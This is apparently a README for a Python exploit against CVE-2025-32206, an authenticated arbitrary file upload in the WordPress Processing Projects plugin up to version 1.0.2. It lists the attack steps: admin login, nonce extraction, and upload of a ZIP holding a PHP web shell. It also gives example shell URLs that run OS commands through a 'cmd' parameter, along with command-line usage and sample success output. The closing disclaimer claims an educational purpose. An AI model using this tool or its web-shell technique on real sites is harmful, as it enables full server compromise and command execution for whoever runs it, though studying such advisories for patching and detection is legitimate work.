
# CVE-2025-32206 - WordPress Processing Projects <= 1.0.2 Arbitrary File Upload Exploit

![CVE-2025-32206 Banner](https://img.shields.io/badge/status-CRITICAL-red)

---

## 🔍 CVE Information

- **CVE ID:** CVE-2025-32206  
- **Vulnerability Type:** Unrestricted File Upload (Web Shell Upload)  
- **Affected Plugin:** Processing Projects WordPress Plugin  
- **Affected Versions:** From unknown (n/a) through **1.0.2**  
- **CVSS Score:** **9.1 (CRITICAL)**  
- **Vector:** `CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H`

> "Unrestricted Upload of File with Dangerous Type vulnerability in LABCAT Processing Projects allows attackers to upload a web shell to a web server. This can lead to full compromise."

---

## 🧑‍💻 Exploit Description

This Python exploit script targets WordPress sites using the vulnerable **Processing Projects** plugin (version <= 1.0.2). The plugin improperly handles file uploads from authenticated users, allowing them to upload arbitrary ZIP files that include executable PHP code (web shells).

The exploit script:

1. Authenticates to the target WordPress site as an administrator.
2. Navigates to the vulnerable endpoint and auto-extracts nonce fields.
3. Creates a ZIP file (`Nxploited.zip`) containing a malicious PHP shell (`Nxploit.php`).
4. Uploads the file via a POST request mimicking WordPress admin behavior.
5. Checks if the shell is accessible at:
   - `http://target.com/wp-content/uploads/processing-projects/Nxploit.php`

---

## 🐚 Shell Usage

Once the shell is uploaded successfully, it can be used to execute system commands via the `cmd` parameter. Examples:

```bash
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
```

This shell executes arbitrary OS commands and returns their output directly in the response.

---

## 🚀 Usage

```bash
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g. http://target.com/wordpress)
  -un, --username USERNAME     WordPress admin username
  -p, --password PASSWORD      WordPress admin password
```

---

## 📄 Sample Output

```bash

[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi

[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
```

---

## ⚠️ Disclaimer

This script is provided **for educational purposes only**. Unauthorized use of this exploit on systems you do not own or have explicit permission to test **is illegal and unethical**.

Always follow responsible disclosure practices and use this tool only in controlled environments or with explicit authorization.

---

*By : Nxploited | Khaled Alenazi*
